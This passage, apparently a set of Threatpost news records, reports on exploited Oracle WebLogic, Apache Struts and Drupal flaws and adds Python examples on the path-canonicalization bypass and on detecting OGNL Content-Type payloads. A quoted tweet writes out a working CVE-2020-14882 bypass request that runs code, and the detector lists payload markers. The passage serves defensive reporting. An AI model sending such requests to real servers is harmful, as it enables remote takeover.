Panda would then execute the file via PowerShell.\n\nPanda has changed up its payload over the summer as well, so that it\u2019s initial payload now uses the Certutil command-line utility \u2013 which can be used to obtain certificate authority information and configure Certificate Services \u2013 to download the secondary miner payload.\n\nThough the threat actor has swapped up its payloads, targeting and infrastructure, very little of its TTPs [tactics, techniques and procures] are sophisticated, Cisco\u2019s Evans told Threatpost.\n\nFor instance, \u201cThey attempt to hide their miners using the exact same popular techniques we see with other groups,\u201d he told Threatpost. 
\u201cTheir infrastructure is predictable: I can usually peg a new Panda domain as soon as I see it in the data; they tend to just be iterations of each other. Their early infrastructure was registered using an email address that immediately allowed Dave to pivot into their social media in China. They attack the same honeypots day after day with the same payloads. They don\u2019t even bother to confirm their victims are running a vulnerable system before they deliver an exploit.\u201d\n\nBetween swapping up its tactics, domains and payloads, researchers said that Panda has now made more than $100,000 through illicit cryptomining \u2013 and moving forward, Panda remains an active threat that system administers should be wary of.\n\n\u201cThere are several ways to detect mining activity but let\u2019s focus on the simple solutions of patching and basic security controls,\u201d Evans told Threatpost. \u201cIf you\u2019re running a web-accessible WebLogic server that has hasn\u2019t been patched against vulnerabilities like CVE-2017-10271, it\u2019s likely they have at least targeted the system for exploitation if not actually dropped a miner on it\u2026 In addition, if you don\u2019t need it open to the Internet, take it off.\u201d\n\n_**Interested in the role of artificial intelligence in cybersecurity, for both offense and defense? Don\u2019t miss our free **_[_**Threatpost webinar**_](<https://register.gotowebinar.com/register/8988544242398214146?source=ART>)_**, AI and Cybersecurity: Tools, Strategy and Advice, with senior editor Tara Seals and a panel of experts. 
**__**[Click here to register.](<https://register.gotowebinar.com/register/8988544242398214146?source=ART>)**_\n", "cvss3": {}, "published": "2019-09-17T21:04:35", "type": "threatpost", "title": "Panda Threat Group Mines for Monero With Updated Payload, Targets", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2017-5638", "CVE-2019-2725"], "modified": "2019-09-17T21:04:35", "id": "THREATPOST:12E93CDF8BAC1B158CE1737E859FDD80", "href": "https://threatpost.com/panda-threat-group-mines-for-monero-with-updated-payload-targets/148419/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:25:45", "description": "Oracle is urging customers to fast-track a patch for a critical flaw in its WebLogic Server under active attack. The company said it has received numerous reports that attackers were targeting the vulnerability [patched last month](<https://threatpost.com/oracle-tackles-405-bugs-for-april-quarterly-patch-update/154737/>).\n\nOracle WebLogic Server is a popular application server used in building and deploying enterprise Java EE applications. The server has a remote code execution flaw, CVE-2020-2883, that can be exploited by unauthenticated attackers to take over unpatched systems.\n\nEric Maurice, director of security assurance, said [in a post last week](<https://blogs.oracle.com/security/apply-april-2020-cpu>) that the flaw was addressed in [Oracle\u2019s April 2020 Critical Patch Update](<https://threatpost.com/oracle-tackles-405-bugs-for-april-quarterly-patch-update/154737/>), which fixed 405 flaws, including 286 that were remotely exploitable across nearly two dozen product lines.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cOracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches,\u201d according to Oracle\u2019s security update. 
“In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.”

Shortly before Oracle’s warning of the active exploits, proof-of-concept exploit code for the flaw [was also published](<https://github.com/hktalent/CVE_2020_2546>) on GitHub last week by a researcher using the alias “hktalent”.

According to Trend Micro’s Zero Day Initiative, the flaw [ranks 9.8 out of 10](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2883>) on the CVSSv3 scale, making it critical severity. Two variants of the flaw were reported. The [first variant of the flaw](<https://www.zerodayinitiative.com/advisories/ZDI-20-504/>) exists within the handling of the T3 protocol, which is used to transport information between WebLogic servers and other types of Java programs. According to ZDI, crafted data in a T3 protocol message can trigger the deserialization of untrusted data – allowing an attacker to execute code in the context of the current process.

The second variant of the flaw exists within [the Oracle Coherence library](<https://www.zerodayinitiative.com/advisories/ZDI-20-570/>), Oracle’s in-memory data grid and distributed caching solution.

“The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data,” according to ZDI. “An attacker can leverage this vulnerability to execute code in the context of the service account.”

Affected versions of WebLogic Server include 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0.

Oracle did not disclose further details about how many were targeted or the attackers behind the hacks.

Oracle WebLogic servers continue to be hard hit with exploits.
In May 2019, researchers warned that [malicious activity](<https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/>) exploiting a recently disclosed Oracle WebLogic critical deserialization vulnerability (CVE-2019-2725) was surging – including to spread the “[Sodinokibi](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>)” ransomware. In June 2019, Oracle said that a critical remote code execution flaw in its WebLogic Server ([CVE-2019-2729](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html>)) was being actively exploited in the wild.

*Threatpost (info), published 2020-05-04T14:57:51, modified 2020-05-04T14:57:51. Source: <https://threatpost.com/oracle-unpatched-versions-of-weblogic-app-server-under-active-attack/155420/>. CVEs: CVE-2019-2725, CVE-2019-2729, CVE-2020-2883. CVSS 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P). Record id: THREATPOST:15EF9F86D0EEBCD1CD450BF55954D1D2.*

### Oracle WebLogic Server RCE Flaw Under Active Attack

*Threatpost record, last seen 2020-10-29T22:18:34.*

If an organization hasn’t updated its Oracle WebLogic servers to protect them against a recently disclosed RCE flaw, researchers have a dire warning: “Assume it has been compromised.”

Oracle WebLogic Server is a popular application server used in building and deploying enterprise Java EE applications. The console component of the WebLogic Server has a flaw, CVE-2020-14882, which ranks 9.8 out of 10 on the CVSS scale. According to Oracle, the attack is “low” in complexity, requires no privileges and no user interaction, and can be exploited by attackers with network access via HTTP.

The flaw was fixed by [Oracle in the massive October release](<https://threatpost.com/oracle-october-patch-update/160407/>) of its quarterly Critical Patch Update (CPU), which fixed 402 vulnerabilities across various product families.
Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0.

The October update was released Oct. 21. This week, Johannes B. Ullrich, dean of research at the SANS Technology Institute, said on Thursday that, based on honeypot observations, cybercriminals are now actively targeting the flaw.

“At this point, we are seeing the scans slow down a bit,” said Ullrich [in a Thursday post](<https://isc.sans.edu/forums/diary/PATCH+NOW+CVE202014882+Weblogic+Actively+Exploited+Against+Honeypots/26734/>). “But they have reached ‘saturation’ meaning that all IPv4 addresses have been scanned for this vulnerability. If you find a vulnerable server in your network: Assume it has been compromised.”

Ullrich said the exploits appear to be based on a Wednesday blog post published (in Vietnamese) by “Jang,” who described how to leverage the flaw to achieve remote code execution via only one GET request. A proof of concept (POC) video accompanies the original article.

Ullrich said exploit attempts on the honeypots so far originate from four IP addresses: 114.243.211.182, 139.162.33.228, 185.225.19.240 and 84.17.37.239.

Ullrich [and others](<https://twitter.com/GossiTheDog/status/1321430443611328513>) are urging Oracle WebLogic Server users to update their systems as soon as possible. Users can find a patch availability document for WebLogic and other vulnerable Oracle products [available here](<https://www.oracle.com/security-alerts/cpuoct2020traditional.html>).

> One for detection peeps. This Oracle WebLogic bug will get abused, pre-auth RCE via a POST request. <https://t.co/y6huXWUuS0>
> 
> — Kevin Beaumont (@GossiTheDog) [October 28, 2020](<https://twitter.com/GossiTheDog/status/1321430443611328513?ref_src=twsrc%5Etfw>)

Oracle WebLogic servers continue to be hard hit with exploits.
In May 2020, Oracle urged customers to [fast-track a patch for a critical flaw](<https://threatpost.com/oracle-unpatched-versions-of-weblogic-app-server-under-active-attack/155420/>) in its WebLogic Server under active attack. The company said it had received numerous reports that attackers were targeting the vulnerability [patched the month before](<https://threatpost.com/oracle-tackles-405-bugs-for-april-quarterly-patch-update/154737/>). In May 2019, researchers warned that [malicious activity](<https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/>) exploiting a recently disclosed Oracle WebLogic critical deserialization vulnerability (CVE-2019-2725) was surging – including to spread the “[Sodinokibi](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>)” ransomware. In June 2019, Oracle said that a critical remote code execution flaw in its WebLogic Server ([CVE-2019-2729](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html>)) was being actively exploited in the wild.

*Threatpost (info), published 2020-10-29T14:49:58, modified 2020-10-29T14:49:58. Source: <https://threatpost.com/oracle-weblogic-server-rce-flaw-attack/160723/>. CVEs: CVE-2019-2725, CVE-2019-2729, CVE-2020-14882. CVSS 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C). Record id: THREATPOST:4844442F117316BC8EEC54269FACDAA8.*

### Oracle Rushes Emergency Fix for Critical WebLogic Server Flaw

*Threatpost record, last seen 2020-11-03T14:35:34.*

Oracle has released a rare out-of-band patch for a remote code-execution flaw in several versions of its WebLogic server.

The vulnerability ([CVE-2020-14750](<https://www.oracle.com/security-alerts/alert-cve-2020-14750.html#AppendixFMW>)) has a CVSS base score of 9.8 out of 10, and is remotely exploitable without authentication (meaning it may be exploited over a network without the need for a username and password).

“Due to the severity of this vulnerability, Oracle strongly recommends that customers apply the updates provided by this Security Alert as soon as possible after they have applied the October 2020 Critical Patch Update,” according to Eric Maurice, director of security assurance at Oracle, [in a Sunday advisory](<https://blogs.oracle.com/security/security-alert-cve-2020-14750-released>).

While specific details of the flaw were not disclosed, Oracle’s alert said it exists in the Console of the Oracle WebLogic Server and can be exploited via the HTTP network protocol.
A potential attack has “low” complexity and no user interaction is required, said Oracle.

Oracle WebLogic Server is a popular application server used in building and deploying enterprise Java EE applications. Affected versions of WebLogic Server include 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0.

> Oracle released an out-of-band security alert to address a vulnerability—CVE-2020-14750—in Oracle WebLogic Server. Patch ASAP! <https://t.co/34wm2YYgnx> [#Cyber](<https://twitter.com/hashtag/Cyber?src=hash&ref_src=twsrc%5Etfw>) [#Cybersecurity](<https://twitter.com/hashtag/Cybersecurity?src=hash&ref_src=twsrc%5Etfw>) [#InfoSec](<https://twitter.com/hashtag/InfoSec?src=hash&ref_src=twsrc%5Etfw>)
> 
> — US-CERT (@USCERT_gov) [November 2, 2020](<https://twitter.com/USCERT_gov/status/1323343180218195969?ref_src=twsrc%5Etfw>)

Oracle said that the vulnerability “is related to” CVE-2020-14882, which is also a remote code-execution flaw in WebLogic Servers. CVE-2020-14882 was fixed by [Oracle in the massive October release](<https://threatpost.com/oracle-october-patch-update/160407/>) of its quarterly Critical Patch Update (CPU), which fixed 402 vulnerabilities across various product families. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0.

Security experts on Twitter [have pointed to](<https://twitter.com/breditor/status/1323435478218022913>) the fact that the fix for CVE-2020-14882 could be bypassed by merely changing the case of a character in the request. This sidesteps the path-traversal blacklist that was implemented to block the flaw, bypassing the patch.

> [#CVE](<https://twitter.com/hashtag/CVE?src=hash&ref_src=twsrc%5Etfw>)-2020–14882 Weblogic Unauthorized bypass RCE 
> http://x.x.x.x:7001/console/images/%252E%252E%252Fconsole.portal
> 
> POST:
> 
> _nfpb=true&_pageLabel=&handle=<https://t.co/jBUfUasQC1>.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)<https://t.co/nU8xkK30DU> [pic.twitter.com/uLiggjHnQG](<https://t.co/uLiggjHnQG>)
> 
> — Jas502n (@jas502n) [October 28, 2020](<https://twitter.com/jas502n/status/1321416053050667009?ref_src=twsrc%5Etfw>)

Upon further analysis of the bypass, “The web application is making an authorization decision based on the requested path but it is doing so without first fully decoding and canonicalizing the path,” said Craig Young, security researcher with Tripwire, [in an analysis](<https://www.tripwire.com/state-of-security/vert/actively-exploited-weblogic-vulnerability/>). “The result is that a URL can be constructed to match the pattern for a permitted resource but ultimately access a completely different resource.”

[While the patch for CVE-2020-14882 was released](<https://threatpost.com/oracle-weblogic-server-rce-flaw-attack/160723/>) during an Oct. 21 update, Johannes B. Ullrich, dean of research at the SANS Technology Institute, said last week that, based on honeypot observations, cybercriminals are now actively targeting the flaw.

Oracle WebLogic servers continue to be hard-hit with exploits. In May, Oracle urged customers to [fast-track a patch for a critical flaw](<https://threatpost.com/oracle-unpatched-versions-of-weblogic-app-server-under-active-attack/155420/>) in its WebLogic Server under active attack.
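The decode-then-authorize mistake Young describes above is easy to reproduce outside WebLogic. The following Python is an added example written for this page; it is not WebLogic’s code and not from Tripwire or any of the researchers quoted. It models a gate that matches the once-decoded path against a public prefix and a case-sensitive traversal blacklist while the resource is resolved only after a second decode, and puts the canonicalize-first version beside it. The prefix, the blacklist entries, the handler names and the sample paths are assumptions chosen to mirror the public bypass pattern (the upper- and lower-case double-encoded `..`).

```python
"""Authorization before canonicalization: a model of the bug class, not
WebLogic's code.  Everything below (prefix, blacklist, sample paths) is an
assumption made for this illustration."""
import posixpath
from urllib.parse import unquote

# Assumed policy: unauthenticated callers may fetch static images only.
PUBLIC_PREFIX = "/console/images/"

# Hypothetical case-sensitive blacklist, checked against the once-decoded
# path.  This is the flaw: the server decodes a second time before it resolves
# the resource, so a double-encoded '..' is compared here still encoded.
TRAVERSAL_BLACKLIST = ("../", "%2E%2E/", "%2E%2E%2F")


def flawed_is_public(raw_path: str) -> bool:
    """Decide on the once-decoded path: prefix match plus literal blacklist.
    '%252E%252E%252F' arrives here as '%2E%2E%2F' (listed, blocked) but
    '%252e%252e%252f' as '%2e%2e%2f' (not listed, allowed)."""
    once = unquote(raw_path)  # first decode, done by the front end
    if not once.startswith(PUBLIC_PREFIX):
        return False
    return not any(marker in once for marker in TRAVERSAL_BLACKLIST)


def resolve(raw_path: str) -> str:
    """What the resource layer actually serves: decode until the string stops
    changing (so any depth of percent-encoding collapses, whatever its case),
    then normalise so '..' segments are applied."""
    path = raw_path
    for _ in range(5):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return posixpath.normpath(path)


def hardened_is_public(raw_path: str) -> bool:
    """Canonicalise first, decide second: compare the same canonical form the
    resource lookup will use against the allowed prefix."""
    canonical = resolve(raw_path)
    return canonical.startswith(PUBLIC_PREFIX) and ".." not in canonical


def classify(raw_path: str, check) -> str:
    """'blocked' if the gate refuses; otherwise 'served:<resource>' when the
    resolved resource really is under the public prefix, 'bypass:<resource>'
    when the gate let through a request that resolves somewhere else."""
    if not check(raw_path):
        return "blocked"
    target = resolve(raw_path)
    kind = "served" if target.startswith(PUBLIC_PREFIX) else "bypass"
    return f"{kind}:{target}"


# Constructed sample requests (not captured traffic): a legitimate image, the
# upper-case and lower-case double-encoded traversals, and a single-encoded one.
SAMPLES = [
    "/console/images/logo.png",
    "/console/images/%252E%252E%252Fconsole.portal",
    "/console/images/%252e%252e%252fconsole.portal",
    "/console/images/..%2Fconsole.portal",
]

if __name__ == "__main__":
    for path in SAMPLES:
        print(path)
        print("   flawed:  ", classify(path, flawed_is_public))
        print("   hardened:", classify(path, hardened_is_public))
```

Run it and the flawed gate blocks the upper-case variant but lets the lower-case one through to `/console/console.portal`, which is exactly the shape of the bypass: the decision was made on a spelling of the path, not on the resource it names. The hardened gate resolves the path the way the server will and only then compares it to the allowed prefix, so both variants are refused. The general rule is to authorize on the canonical form that the lookup uses, never on the raw or partially decoded request.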
The company said it had received numerous reports that attackers were targeting the vulnerability [patched the month before](<https://threatpost.com/oracle-tackles-405-bugs-for-april-quarterly-patch-update/154737/>). In May 2019, researchers warned that [malicious activity](<https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/>) exploiting a recently disclosed Oracle WebLogic critical deserialization vulnerability (CVE-2019-2725) was surging – including to spread the [REvil/Sodinokibi](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>) ransomware. In June 2019, Oracle said that a critical remote code-execution flaw in its WebLogic Server ([CVE-2019-2729](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html>)) was being actively exploited in the wild.

*Threatpost (info), published 2020-11-03T13:57:26, modified 2020-11-03T13:57:26. Source: <https://threatpost.com/oracle-update-weblogic-server-flaw/160889/>. CVEs: CVE-2019-2725, CVE-2019-2729, CVE-2020-14750, CVE-2020-14882. CVSS 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C). Record id: THREATPOST:626313834C3B7D13BDDD703C425DACA5.*

### Muhstik Botnet Exploits Highly Critical Drupal Bug

*Threatpost record, last seen 2019-04-25T05:50:10.*

Researchers are warning that a recently discovered and highly critical vulnerability found in Drupal’s CMS platform is now being actively exploited by hackers who are using it to install cryptocurrency miners and to launch DDoS attacks via compromised systems. At the time of the disclosure, last month, researchers said they were not aware of any public exploits.

Now Netlab 360 researchers say they have identified a botnet, dubbed Muhstik, that is taking advantage of the Drupal bug. They said multiple scans on infected Drupal instances reveal [attackers](<https://blog.netlab.360.com/botnet-muhstik-is-actively-exploiting-drupal-cve-2018-7600-in-a-worm-style-en/>) are exploiting the vulnerability by accessing a URL and then injecting exploit code. The technique allows adversaries to execute commands on targeted servers running Drupal.

The Muhstik botnet exploits Drupal vulnerability ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)), impacting versions 6, 7 and 8 of Drupal’s CMS platform.
“This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,” warned MITRE’s Common Vulnerabilities and Exposures bulletin on March 28.

Drupal, which also released a patch for the vulnerability in [March](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>), warned that over one million sites running Drupal are impacted. Unprivileged and untrusted attackers could also modify or delete data hosted on affected CMS platforms, Drupal said.

After further investigation, Netlab researchers said they believe at least three groups of malware were exploiting the vulnerability.

“We noticed one of them has worm-propagation behavior. After investigation, we believe this botnet has been active for quite a time. We name it Muhstik, for this keyword keeps popping up in its binary file name and the communication IRC channel,” wrote Netlab 360 researchers.

According to Netlab, Muhstik is a variant of Tsunami, a malware strain that creates botnets with infected Linux servers and Linux-based IoT devices.

Muhstik has the capability to install two coinminers, XMRig (which mines Monero, XMR) and CGMiner (used here for the open-source, peer-to-peer Dash cryptocurrency), according to Netlab.

Researchers say the botnet uses the open-source XMRig utility to mine cryptocurrency with a self-built mining pool (47.135.208.145:4871). Meanwhile, it uses the popular mining software CGMiner to dig cryptocurrency coins using multiple mining tools (with username reborn.D3), they said.

[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/04/23162156/Botnet.png>)

In addition, Netlab researchers said they intercepted multiple DDoS attack instructions targeting the IP address 46[.]243[.]189[.]102.

Muhstik relies on 11 command and control domains and IP addresses, and the attackers also use the IRC communication protocol to invoke commands for the botnet: “We observed multiple IRC Channels, all starting with ‘muhstik,’” said Netlab researchers in a report. “At present, we can not confirm which specific channels are open on which C2 server. This is due to the characteristics of the IRC protocol itself. Only when we receive a communication instruction from the corresponding channel can we confirm it’s present.”

Muhstik also has capabilities to scan for vulnerable server apps using the aiox86 scanning module.
This module “scans TCP port 80, 8080, 7001, 2004, and tries varieties of different payloads on each port,” according to NetLab.

GreyNoise Intelligence said in a tweet that it detected the botnet exploiting a vulnerability (CVE-2017-10271) in Oracle WebLogic Server as well, indicating that Muhstik is exploiting vulnerabilities in other server applications.

> UPDATE: there is a 95% overlap between the IPs scanning for the previously reported [#drupalgeddon](<https://twitter.com/hashtag/drupalgeddon?src=hash&ref_src=twsrc%5Etfw>) vulnerability and the Oracle CVE-2017-10271 vulnerability.
> 
> — GreyNoise Intelligence (@GreyNoiseIO) [April 18, 2018](<https://twitter.com/GreyNoiseIO/status/986458691787517952?ref_src=twsrc%5Etfw>)

Troy Mursch, founder of Bad Packets Report, told Threatpost that given the criticality of the exploit and the repercussions once it’s used, “the race is on to find vulnerable Drupal installations.”

“I recommend affected users update to Drupal 7.58 or 8.5.1 as soon as possible. To note as well, updating to the patched version doesn’t retroactively ‘unhack’ your site. I recommend website operators check their installation (server) for any of the IoCs mentioned in the 360 Netlab report after completing the update,” he said.

*Threatpost (info), published 2018-04-23T22:13:25, modified 2018-04-23T22:13:25. Source: <https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>. CVEs: CVE-2017-10271, CVE-2018-7600. CVSS 7.5 (AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/). Record id: THREATPOST:5633BBF7C54D598EB76A7B3781EFD2CB.*

### Record Oracle Patch Update Addresses ShadowBrokers, Struts 2 Vulnerabilities

*Threatpost record, last seen 2018-10-06T22:53:48.*

Oracle released its biggest [Critical Patch Update](<http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html>) ever on Tuesday, and with it came added urgency in the form of patches for the Solaris vulnerabilities exposed by the [ShadowBrokers](<https://threatpost.com/shadowbrokers-expose-nsa-access-to-swift-service-bureaus/124996/>) last week, as well as the recent [Apache Struts 2 vulnerability](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>), also under public attack.

In all, Oracle admins have a tall order with 299 patches across most of the company’s product lines; 162 of the vulnerabilities are remotely exploitable.

Two Solaris exploits were leaked by the mysterious ShadowBrokers last Friday. The Solaris attacks were included among a rash of other exploits including a laundry list of Windows attacks, many of which had [already been patched by Microsoft](<https://threatpost.com/shadowbrokers-windows-zero-days-already-patched/125009/>) prior to last Friday’s dump.

One of the Solaris vulnerabilities, code-named EBBISLAND, had been patched in a number of updates dating back to 2012. The other, EXTREMEPARR, was addressed on Tuesday.
It affects Solaris 7-10 on x86 and SPARC architectures, and is a local privilege escalation issue in the [dtappgather](<https://github.com/HackerFantastic/Public/blob/master/exploits/dtappgather-poc.sh>) component. Oracle patched versions 10 and 11.3 on Tuesday.

Researcher Matthew Hickey of U.K. consultancy Hacker House said the EXTREMEPARR attacks go back to Solaris 7, while EBBISLAND affects Solaris 6-10 and is a remote RPC services exploit. Both exploits allow attackers to elevate privileges to root and run shells on a compromised server.

> I said in December that EBBISLAND was likely an exploit for Solaris 6 through 10, I am today confirmed correct (up to 9, still untested) <https://t.co/A3fC7BuwcK>
> 
> — Hacker Fantastic (@hackerfantastic) [April 8, 2017](<https://twitter.com/hackerfantastic/status/850802122224488452>)

“As a security researcher it was an extremely interesting find to discover such well written exploits in a public data dump,” Hickey wrote in a [report](<https://www.myhackerhouse.com/easter-egg-hunt_greetz/#sthash.YMmAy8Ez.dpuf>) published today, “even though the bug was a trivial path traversal for ‘dtappgather’ extensive steps had been taken to protect the attack specifics in the binary and a well tested tool which worked flawlessly on all tested hosts was included.”

Since last August, the ShadowBrokers have periodically released tools belonging to the Equation Group, widely believed to be the U.S. National Security Agency. The Solaris attacks are of particular concern since Solaris systems are the backbone of many enterprise-grade server environments.

> The NSA had the power to hack any Oracle Solaris box in the world via UDP/TCP generically with anti-forensics capabilities and it’s public.
> 
> — Hacker Fantastic (@hackerfantastic) [April 10, 2017](<https://twitter.com/hackerfantastic/status/851561358516736000>)

“This vulnerability can be exploited remotely without authentication or any information about the targeted machine,” said Amol Sarwate, director of [Qualys Vulnerability Labs](<https://blog.qualys.com/laws-of-vulnerabilities/2017/04/18/oracle-plugs-struts-hole-along-with-299-total-vulnerabilities>). “These are very critical vulnerabilities.”

The [Apache Struts 2 vulnerability](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>) has been public since early March, though it’s been publicly exploited for much longer. The flaw is in the Jakarta Multipart parser in Struts 2 2.3 before 2.3.32 and in 2.5 before 2.5.10.1. A remote attacker could send a request carrying a malicious Content-Type value and have it executed by the server. Public scans and attacks ramped up immediately upon disclosure of the issue and development of a Metasploit module. For the most part, Linux-based DDoS bots were behind most of the exploit attempts, but a spate of attacks were detected attempting to install [Cerber ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) on vulnerable Windows servers.

Oracle patched Struts 2 in 25 of its products, including 19 different instances of its Oracle Financial Services Applications. Most of these Oracle applications, however, are not internet-facing and live behind an enterprise firewall.

“That could be a little bit of a saving grace for some of these services,” Qualys’ Sarwate said.
There could be some instances, however, where these apps are exposed to the public network, for remote administration purposes, for example. There are also some cases in which admins may be learning for the first time that Struts 2 is running inside an Oracle product. “For a normal admin, it could be a little difficult unless a vendor tells them these are the products you’re running that are affected by the Struts 2 vulnerability. It could take some admins by surprise.”

While there were 47 patches in total for the financial applications suite, the MySQL database also received a hefty load of 39 fixes, 11 of which are remotely exploitable without authentication. The Oracle Retail Applications suite also had 39 vulnerabilities addressed, 32 of which were remotely exploitable. Oracle Fusion Middleware received 31 patches, 20 of which were for remotely exploitable vulnerabilities.

The previous record for quarterly Oracle patches was last July when [276 patches](<https://threatpost.com/oracle-patches-record-276-vulnerabilities-with-july-critical-patch-update/119373/>) were released; January’s update, the first for 2017, had [270 patches](<https://threatpost.com/oracle-patches-270-vulnerabilities-in-years-first-critical-patch-update/123155/>).

*Threatpost (info), published 2017-04-19T07:20:09, modified 2017-04-21T19:31:17. Source: <https://threatpost.com/record-oracle-patch-update-addresses-shadowbrokers-struts-2-vulnerabilities/125046/>. CVEs: CVE-2017-5638, CVE-2018-11776. CVSS 10.0 (AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/). Record id: THREATPOST:F4E175435A7C5D2A4F16D46A939B175E.*

### Equifax confirms the breach culprit was Apache Struts CVE-2017-5638

*Threatpost record, last seen 2018-10-06T22:53:10.*

Equifax said the culprit behind [this summer’s massive breach of 143 million Americans](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) was indeed CVE-2017-5638, an Apache Struts vulnerability patched back in March.

The bug was widely assumed by experts to be the “U.S. website application vulnerability” implicated by the company last Thursday, especially after an Apache spokeswoman [told Reuters](<https://www.reuters.com/article/us-equifax-cyber/criticism-of-equifax-data-breach-response-mounts-shares-tumble-idUSKCN1BJ1NF>) on Friday that it appeared the consumer credit reporting agency hadn’t applied patches for flaws discovered earlier this year.

On Wednesday the company specified the flaw in a statement [posted to its site](<https://www.equifaxsecurity2017.com/>) and stressed it was continuing to work alongside law enforcement to investigate the incident.

> “Equifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cybersecurity firm to determine what information was accessed and who has been impacted. We know that criminals exploited a U.S. website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement.”

Until the news broke on Wednesday there was still mounting confusion over which Struts vulnerability attackers used.

René Gielen, vice president of the Apache Struts Project Management Committee (PMC) at the Apache Software Foundation, [wrote in an open letter over the weekend](<https://threatpost.com/apache-foundation-refutes-involvement-in-equifax-breach/127910/>) that attackers either used an unknown Struts zero day or an earlier announced vulnerability.
A separate remote code execution bug, CVE-2017-9805, was fixed in Struts [last Tuesday](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>), but Gielen said the Apache PMC would have known about it if it was being exploited in July.

An internal report last week from equity research firm Baird said a Struts vulnerability was behind the breach as well. The analyst who penned the report, however, failed to specify which vulnerability and neglected to state how he arrived at that conclusion.

Jeff Williams, chief technology officer of Contrast Security, wrote last Saturday that CVE-2017-5638 was likely to blame for the breach.

“The first vulnerability from March seems much more likely because it’s easier to exploit and much better known. It also fits the timeline better, since it was released months before Equifax was attacked in July,” Williams wrote, adding on Thursday that he was familiar with several large organizations which took months to fix the bug.

“The process of rewriting, retesting, and redeploying can take months. I just visited one of the largest telecom providers where this effort took more than four months and millions of dollars. Without runtime protection in place, they have to do this every time a new library vulnerability comes out,” Williams said.

The vulnerability, a flaw in the Jakarta Multipart parser upload function in Apache Struts 2, allowed an attacker to make a maliciously crafted request to a web application built on Struts. The vulnerability, which first surfaced on Chinese forums before it was discovered by researchers with Cisco Talos, [was patched back in March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>) but proof of concept exploit code quickly found its way into Metasploit.
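Both Struts passages above (the April 2017 patch round-up and this one) describe the same mechanism: the Jakarta Multipart parser took a malformed Content-Type header and evaluated it, which is why the public exploits put an OGNL expression in that header. That makes the header itself the detection surface. The Python below is an added example for this page, not code from Threatpost, Equifax, Apache, Cisco Talos or Metasploit: it parses raw HTTP request heads and flags a Content-Type that carries OGNL expression markers, or that does not even have the type/subtype shape a genuine Content-Type has. The marker list, the sanity regex, the verdict names and the sample requests are all constructed for this illustration.

```python
"""Flag CVE-2017-5638-style requests by inspecting the Content-Type header.
Added example; the marker list, regex and samples are assumptions."""
import re
from typing import Dict, List

# OGNL expression openers and a few class references that appear in public
# CVE-2017-5638 payloads.  None of these belongs in a legitimate Content-Type.
OGNL_MARKERS = re.compile(
    r"%\{|\$\{|#_memberAccess|@ognl\.OgnlContext@|@java\.lang\.Runtime@"
    r"|java\.lang\.ProcessBuilder",
    re.IGNORECASE,
)

# The shape a real Content-Type has: type/subtype, then optional ;name=value
# parameters.  Anything else should never reach a multipart parser.
SANE_CONTENT_TYPE = re.compile(
    r'^[\w.+-]+/[\w.+-]+(\s*;\s*[\w-]+=("[^"]*"|[^;\s]+))*\s*$'
)


def parse_headers(raw_request: str) -> Dict[str, str]:
    """Split a raw HTTP/1.x request head into a lower-cased header dict.
    Assumes no header folding; tolerates CRLF or LF line endings."""
    head = re.split(r"\r?\n\r?\n", raw_request, maxsplit=1)[0]
    headers: Dict[str, str] = {}
    for line in head.splitlines()[1:]:  # [0] is the request line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


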